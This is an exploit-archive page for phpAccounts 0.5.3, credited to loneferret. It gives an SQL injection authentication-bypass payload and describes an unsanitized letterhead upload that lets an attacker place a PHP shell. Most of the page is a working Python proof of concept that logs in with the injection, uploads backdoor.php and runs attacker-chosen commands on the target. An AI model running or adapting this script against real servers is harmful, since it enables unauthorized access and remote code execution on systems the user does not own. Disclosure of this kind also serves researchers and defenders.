phpAccounts 0.5.3 SQL Injection

2012.06.09
Credit: loneferret
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###################################################################################### # Exploit phpAcounts v.0.5.3 SQL Injection # Date: June 6nd 2012 # Author: loneferret # Version: 0.5.3 # Vendor Url: http://phpaccounts.com/ # Tested on: Ubuntu Server 11.10 ###################################################################################### # Discovered by: loneferret ###################################################################################### # Old app, still fun. Auth. Bypass: http://<server>/phpaccounts/index.php Username: x' or '1'='1'# Password: <whatever> Upload php shell in preferences Letterhead image upload does not sanitize file extensions. http://server/index.php?page=tasks&action=preferences Acess shell: Where '1' is the user's ID. http://server/phpaccounts/users/1/<filename> ---- Python PoC --------- #!/usr/bin/python import re, mechanize import urllib, sys print "\n[*] phpAcounts v.0.5.3 Remote Code Execution" print "[*] Vulnerability discovered by loneferret" print "[*] Offensive Security - http://www.offensive-security.com\n" if (len(sys.argv) != 3): print "[*] Usage: poc.py <RHOST> <RCMD>" exit(0) rhost = sys.argv[1] rcmd = sys.argv[2] print "[*] Bypassing Login ." try: br = mechanize.Browser() br.open("http://%s/phpaccounts/index.php?frameset=true" % rhost) assert br.viewing_html() br.select_form(name="loginForm") br.select_form(nr=0) br.form['Login_Username'] = "x' or '1'#" br.form['Login_Password'] = "pwnd" print "[*] Triggering SQLi .." br.submit() except: print "[*] Oups..Something happened" exit(0) print "[*] Uploading Shell ..." try: br.open("http://%s/phpaccounts/index.php?page=tasks&action=preferences" % rhost) assert br.viewing_html() br.select_form(nr=0) br.form["Preferences[LETTER_HEADER]"] = 'test' br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="letterhead_image") br.submit(nr=2) except: print "[*] Upload didn't work" exit(0) print "[*] Command Executed\n" try: shell = urllib.urlopen("http://%s/phpaccounts/users/1/backdoor.php?cmd=%s" % (rhost,rcmd)) print shell.read() except: print "[*] Oups." exit(0)

References:

http://phpaccounts.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top